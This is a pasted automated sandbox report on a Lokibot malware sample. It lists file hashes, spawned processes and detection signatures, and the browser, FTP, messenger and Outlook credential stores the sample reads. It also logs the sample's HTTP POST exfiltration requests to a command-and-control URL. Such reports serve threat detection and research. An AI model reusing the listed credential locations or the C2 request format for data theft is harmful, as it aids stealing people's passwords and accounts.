Advertisement
paladin316

Exes_1caa3534ed0d3dc3efc081370783589c_exe_2019-08-13_17_30.txt

Aug 13th, 2019
1,355
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.37 KB | None | 0 0
  1.  
  2. * MalFamily: "Lokibot"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_1caa3534ed0d3dc3efc081370783589c.exe"
  7. * File Size: 948736
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "954ae7151829d5da60e9d74bb0870550cc903fd7e2c6b7f84fb8fdd528932588"
  10. * MD5: "1caa3534ed0d3dc3efc081370783589c"
  11. * SHA1: "4dadbbdbb4178f61ae36f43c0a6d4f915064ddbf"
  12. * SHA512: "c30e7e502d162ffc180f5666d5fd035ebafaf96821ee98ad7c98a80ec5b2d8b4ea7d4eabfba0828d60090a377089e3c610f23b94083a1681300f9be6833158cd"
  13. * CRC32: "ADE81E6F"
  14. * SSDEEP: "12288:Stb20Qc3lT7af41ePBRYuQLKpqeUhbTv5OFgNuPPpHSgavTbsGIhpbQdQV86A:Stb20pkaCqT5TBWgNQ7avTCpbF86A"
  15.  
  16. * Process Execution:
  17. "Exes_1caa3534ed0d3dc3efc081370783589c.exe",
  18. "svchost.exe",
  19. "services.exe",
  20. "taskhost.exe",
  21. "sc.exe",
  22. "svchost.exe",
  23. "svchost.exe",
  24. "WerFault.exe",
  25. "wermgr.exe"
  26.  
  27.  
  28. * Executed Commands:
  29. "C:\\Windows\\system32\\lsass.exe",
  30. "taskhost.exe $(Arg0)",
  31. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  32. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  33. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  34. "C:\\Windows\\system32\\WerFault.exe -u -p 2144 -s 288",
  35. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_aedc21d0f85849fb8dc84776d0617c291bc57e6_cab_05a33d07\""
  36.  
  37.  
  38. * Signatures Detected:
  39.  
  40. "Description": "At least one process apparently crashed during execution",
  41. "Details":
  42.  
  43.  
  44. "Description": "Creates RWX memory",
  45. "Details":
  46.  
  47.  
  48. "Description": "A process attempted to delay the analysis task.",
  49. "Details":
  50.  
  51. "Process": "svchost.exe tried to sleep 1440 seconds, actually delayed analysis time by 0 seconds"
  52.  
  53.  
  54.  
  55.  
  56. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  57. "Details":
  58.  
  59. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  60.  
  61.  
  62. "http_version_old": "HTTP traffic uses version 1.0"
  63.  
  64.  
  65. "suspicious_request": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Performs some HTTP requests",
  71. "Details":
  72.  
  73. "url": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "Executed a process and injected code into it, probably while unpacking",
  79. "Details":
  80.  
  81. "Injection": "Exes_1caa3534ed0d3dc3efc081370783589c.exe(2736) -> svchost.exe(2304)"
  82.  
  83.  
  84.  
  85.  
  86. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  87. "Details":
  88.  
  89. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 14186779 times"
  90.  
  91.  
  92.  
  93.  
  94. "Description": "Steals private information from local Internet browsers",
  95. "Details":
  96.  
  97. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  98.  
  99.  
  100.  
  101.  
  102. "Description": "Creates a hidden or system file",
  103. "Details":
  104.  
  105. "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  106.  
  107.  
  108. "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
  109.  
  110.  
  111.  
  112.  
  113. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  114. "Details":
  115.  
  116.  
  117. "Description": "Harvests credentials from local FTP client softwares",
  118. "Details":
  119.  
  120. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  121.  
  122.  
  123. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  124.  
  125.  
  126. "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
  127.  
  128.  
  129. "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
  130.  
  131.  
  132. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
  133.  
  134.  
  135. "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
  136.  
  137.  
  138. "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
  139.  
  140.  
  141. "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
  142.  
  143.  
  144. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
  145.  
  146.  
  147. "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
  148.  
  149.  
  150.  
  151.  
  152. "Description": "Harvests information related to installed instant messenger clients",
  153. "Details":
  154.  
  155. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  156.  
  157.  
  158.  
  159.  
  160. "Description": "Harvests information related to installed mail clients",
  161. "Details":
  162.  
  163. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  164.  
  165.  
  166. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
  167.  
  168.  
  169. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  170.  
  171.  
  172. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  173.  
  174.  
  175. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
  176.  
  177.  
  178. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
  179.  
  180.  
  181. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  182.  
  183.  
  184. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  185.  
  186.  
  187. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  188.  
  189.  
  190. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
  191.  
  192.  
  193. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
  194.  
  195.  
  196. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  197.  
  198.  
  199. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  200.  
  201.  
  202. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  203.  
  204.  
  205. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
  206.  
  207.  
  208. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  209.  
  210.  
  211. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
  212.  
  213.  
  214. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
  215.  
  216.  
  217. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
  218.  
  219.  
  220. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
  221.  
  222.  
  223. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  224.  
  225.  
  226. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  227.  
  228.  
  229. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  230.  
  231.  
  232. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  233.  
  234.  
  235. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
  236.  
  237.  
  238. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  239.  
  240.  
  241. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  242.  
  243.  
  244. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
  245.  
  246.  
  247. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
  248.  
  249.  
  250. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  251.  
  252.  
  253. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  254.  
  255.  
  256. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  257.  
  258.  
  259. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  260.  
  261.  
  262. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  263.  
  264.  
  265. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
  266.  
  267.  
  268.  
  269.  
  270. "Description": "Collects information to fingerprint the system",
  271. "Details":
  272.  
  273.  
  274. "Description": "Created network traffic indicative of malicious activity",
  275. "Details":
  276.  
  277. "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
  278.  
  279.  
  280. "signature": "ET TROJAN LokiBot Fake 404 Response"
  281.  
  282.  
  283. "signature": "ET TROJAN LokiBot Checkin"
  284.  
  285.  
  286. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
  287.  
  288.  
  289. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
  290.  
  291.  
  292. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
  293.  
  294.  
  295. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
  296.  
  297.  
  298.  
  299.  
  300.  
  301. * Started Service:
  302. "VaultSvc",
  303. "WerSvc",
  304. "W32Time"
  305.  
  306.  
  307. * Mutexes:
  308. "6EFA73A4746045B65DEE781E",
  309. "Local\\WERReportingForProcess2144",
  310. "Global\\\\xe5\\x88\\x90\\xc2\\xaf",
  311. "Global\\\\xed\\x95\\xb0\\xc6\\xb7",
  312. "WERUI_BEX64-aedc21d0f85849fb8dc84776d0617c291bc57e6"
  313.  
  314.  
  315. * Modified Files:
  316. "C:\\Users\\user\\AppData\\Local\\Temp\\aut6216.tmp",
  317. "C:\\Users\\user\\AppData\\Local\\Temp\\1.resource",
  318. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  319. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
  320. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  321. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  322. "C:\\Windows\\sysnative\\LogFiles\\Scm\\81581aa9-cc73-4fbb-b69a-b3e533296974",
  323. "\\??\\PIPE\\lsarpc",
  324. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC50D.tmp.appcompat.txt",
  325. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC905.tmp.WERInternalMetadata.xml",
  326. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC935.tmp.hdmp",
  327. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERD0B8.tmp.mdmp",
  328. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_aedc21d0f85849fb8dc84776d0617c291bc57e6_cab_05a33d07\\WERC50D.tmp.appcompat.txt",
  329. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_aedc21d0f85849fb8dc84776d0617c291bc57e6_cab_05a33d07\\WERC905.tmp.WERInternalMetadata.xml",
  330. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_aedc21d0f85849fb8dc84776d0617c291bc57e6_cab_05a33d07\\WERC935.tmp.hdmp",
  331. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_aedc21d0f85849fb8dc84776d0617c291bc57e6_cab_05a33d07\\WERD0B8.tmp.mdmp",
  332. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_aedc21d0f85849fb8dc84776d0617c291bc57e6_cab_05a33d07\\Report.wer",
  333. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_aedc21d0f85849fb8dc84776d0617c291bc57e6_cab_05a33d07\\Report.wer.tmp"
  334.  
  335.  
  336. * Deleted Files:
  337. "C:\\Users\\user\\AppData\\Local\\Temp\\aut6216.tmp",
  338. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  339. "C:\\Windows\\SysWOW64\\svchost.exe",
  340. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC50D.tmp",
  341. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC50D.tmp.appcompat.txt",
  342. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC905.tmp",
  343. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC905.tmp.WERInternalMetadata.xml",
  344. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC935.tmp",
  345. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC935.tmp.hdmp",
  346. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERD0B8.tmp",
  347. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERD0B8.tmp.mdmp",
  348. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_aedc21d0f85849fb8dc84776d0617c291bc57e6_cab_05a33d07\\Report.wer.tmp"
  349.  
  350.  
  351. * Modified Registry Keys:
  352. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  353. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  354. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  355. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  356. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  357.  
  358.  
  359. * Deleted Registry Keys:
  360.  
  361. * DNS Communications:
  362.  
  363. "type": "A",
  364. "request": "grainertypople.sytes.net",
  365. "answers":
  366.  
  367. "data": "154.120.72.182",
  368. "type": "A"
  369.  
  370.  
  371.  
  372.  
  373.  
  374. * Domains:
  375.  
  376. "ip": "154.120.72.182",
  377. "domain": "grainertypople.sytes.net"
  378.  
  379.  
  380.  
  381. * Network Communication - ICMP:
  382.  
  383. * Network Communication - HTTP:
  384.  
  385. "count": 2,
  386. "body": "",
  387. "uri": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php",
  388. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  389. "method": "POST",
  390. "host": "grainertypople.sytes.net",
  391. "version": "1.0",
  392. "path": "/DHBFMM/Panel/five/fre.php",
  393. "data": "POST /DHBFMM/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: grainertypople.sytes.net\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 794AB976\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
  394. "port": 80
  395.  
  396.  
  397. "count": 24,
  398. "body": "",
  399. "uri": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php",
  400. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  401. "method": "POST",
  402. "host": "grainertypople.sytes.net",
  403. "version": "1.0",
  404. "path": "/DHBFMM/Panel/five/fre.php",
  405. "data": "POST /DHBFMM/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: grainertypople.sytes.net\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 794AB976\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
  406. "port": 80
  407.  
  408.  
  409.  
  410. * Network Communication - SMTP:
  411.  
  412. * Network Communication - Hosts:
  413.  
  414. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement